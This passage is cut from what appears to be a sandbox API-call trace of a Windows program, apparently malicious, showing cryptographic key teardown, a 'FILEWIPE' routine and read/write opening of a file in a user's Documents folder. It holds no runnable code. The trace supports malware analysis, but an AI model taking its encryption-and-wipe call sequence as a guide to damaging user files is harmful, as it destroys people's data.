wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.188] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.188] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.188] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.188] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.188] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.192] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.193] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.193] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.199] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0175.199] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.199] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.199] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0175.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.199] CryptDestroyKey (hKey=0x90af18) returned 1 [0175.199] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.199] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.200] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.200] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.200] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.200] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.200] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.200] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.201] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.201] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.201] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.201] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.201] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.201] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0175.201] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.201] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.201] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.201] FreeLibrary (hLibModule=0x74f20000) returned 1 [0175.201] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.201] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.201] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.201] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.206] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0175.206] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0175.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.206] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="folder.ico", cAlternateFileName="")) returned 0x90af58 [0175.207] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.207] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.207] CharLowerBuffW (in: lpsz="byte[29926]", cchLength=0xb | out: lpsz="byte[29926]") returned 0xb [0175.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.208] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0175.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.208] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0175.208] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0175.209] FreeLibrary (hLibModule=0x75c90000) returned 1 [0175.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.209] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0175.209] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0175.209] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0175.209] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.211] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.212] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0175.212] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.212] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0175.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba570, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0175.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0175.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0175.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0175.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0175.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0175.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa664f8 | out: hHeap=0x8a0000) returned 1 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0175.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0175.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0175.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0175.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) 